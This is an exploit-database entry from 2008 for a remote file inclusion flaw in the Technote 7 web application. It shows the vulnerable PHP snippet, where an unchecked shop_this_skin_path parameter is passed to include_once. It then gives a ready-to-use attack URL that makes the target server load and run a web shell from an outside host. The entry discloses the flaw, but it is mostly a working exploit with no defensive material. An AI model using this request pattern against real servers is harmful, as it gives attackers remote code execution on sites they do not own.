Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability

2008-09-17T00:00:00
ID 1337DAY-ID-3682
Type zdt
Reporter webDEViL
Modified 2008-09-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability
====================================================================



#-----------Technote 7 Remote File Inclusion------------------------#


bash-3.1# cat technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php

...snip...
$TWIN_SET['dir_path']= "$shop_this_skin_path/3_plugin_twindow/skin_gray";
...snip...
include_once "$TWIN_SET[dir_path]/frame_design.php";

http://site/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://ip.a.dd.r/shell.php?



#  0day.today [2018-04-05]  #